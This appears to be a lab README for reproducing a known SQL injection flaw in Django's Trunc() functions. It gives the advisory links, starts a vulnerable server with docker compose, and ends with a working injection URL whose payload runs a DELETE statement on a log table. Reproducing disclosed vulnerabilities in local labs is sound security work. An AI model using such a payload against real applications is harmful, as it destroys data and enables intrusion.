Django is a high-level Python web framework that encourages rapid development and clean, pragmatic design.
Django released a security update on July 4, 2022, which fixes a SQL injection vulnerability in the Trunc() database functions. This vulnerability affects Django versions before 4.0.6, 3.2.14.
References:
- https://www.djangoproject.com/weblog/2022/jul/04/security-releases/
- https://github.com/django/django/commit/0dc9c016fadb71a067e5a42be30164e3f96c0492
Execute the following command to start a vulnerable Django 4.0.5 server:
docker compose up
After the server is started, you can access the web page at http://localhost:8000.
The web application uses the Trunc function to aggregate page click counts by datetime. Visit http://localhost:8000/?date=minute to see the number of clicks per minute:
To exploit the SQL injection vulnerability, modify the date parameter with malicious input:
http://localhost:8000/?date=minute', NOW()) FROM vuln_weblog; DELETE FROM vuln_weblog; --
The SQL error message will be displayed, confirming the successful injection:
